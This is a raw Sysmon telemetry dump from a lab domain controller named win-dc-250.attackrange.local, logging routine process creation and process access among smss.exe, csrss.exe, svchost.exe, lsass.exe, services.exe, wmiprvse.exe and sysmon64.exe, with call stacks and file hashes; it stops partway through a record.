10341000x80000000000000009344Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:52.795{08A6967A-4750-6000-0105-000000009A01}22003888C:\Windows\System32\smss.exe{08A6967A-4750-6000-0205-000000009A01}4788C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\SYSTEM32\ntdll.dll+8bf9e|C:\Windows\SYSTEM32\ntdll.dll+8bd49|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+1ee4|\SystemRoot\System32\smss.exe+20a1|\SystemRoot\System32\smss.exe+1c92|\SystemRoot\System32\smss.exe+1af6|\SystemRoot\System32\smss.exe+14cb|\SystemRoot\System32\smss.exe+130f|\SystemRoot\System32\smss.exe+1096|C:\Windows\SYSTEM32\ntdll.dll+5179f 154100x80000000000000009343Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:52.802{08A6967A-4750-6000-0205-000000009A01}4788C:\Windows\System32\csrss.exe10.0.14393.2969 (rs1_release.190503-1820)Client Server Runtime ProcessMicrosoft® Windows® Operating SystemMicrosoft CorporationCSRSS.Exe%%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e72SystemMD5=955E9227AA30A08B7465C109B863B886,SHA256=D896480BC8523FAD3AE152C81A2B572022C3778A34A6D85E089D150A68E9165E,IMPHASH=273BC9D936389D79244E6E56BE5096B6{08A6967A-4750-6000-0105-000000009A01}2200C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000000f8 0000007c 10341000x80000000000000009342Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:52.795{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009341Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:52.795{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009340Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:52.795{08A6967A-4284-6000-0200-000000009A01}452992C:\Windows\System32\smss.exe{08A6967A-4750-6000-0105-000000009A01}2200C:\Windows\System32\smss.exe0x101441C:\Windows\SYSTEM32\ntdll.dll+a6624|\SystemRoot\System32\smss.exe+3fee|\SystemRoot\System32\smss.exe+3b53|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009339Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:52.795{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009338Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:52.795{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009337Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:52.795{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009336Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:52.795{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009335Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:52.795{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009334Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:52.795{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009333Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:52.795{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009332Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:52.795{08A6967A-4284-6000-0200-000000009A01}452992C:\Windows\System32\smss.exe{08A6967A-4750-6000-0105-000000009A01}2200C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\SYSTEM32\ntdll.dll+8bf9e|C:\Windows\SYSTEM32\ntdll.dll+8bd49|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+2042|\SystemRoot\System32\smss.exe+36ee|\SystemRoot\System32\smss.exe+3c31|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\ntdll.dll+5179f 154100x80000000000000009331Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:52.794{08A6967A-4750-6000-0105-000000009A01}2200C:\Windows\System32\smss.exe10.0.14393.2969 (rs1_release.190503-1820)Windows Session ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationsmss.exe\SystemRoot\System32\smss.exe 000000f8 0000007c C:\Windows\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e72SystemMD5=725EC50D4B0F607BF5B45B5E0115770B,SHA256=56881BCAEAC350107A6453F38F020FE0E284DBE2E8A6F37ED482985E0DD98EA7,IMPHASH=09DDECA5943933973FE7DDDD24ED724A{08A6967A-4284-6000-0200-000000009A01}452C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 10341000x80000000000000009540Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.998{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009539Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.998{08A6967A-4286-6000-0B00-000000009A01}852100C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009538Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.982{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009537Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.982{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009536Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.982{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009535Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.967{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009534Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.967{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009533Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.967{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009532Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.967{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009531Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.967{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009530Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.967{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009529Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.967{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009528Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 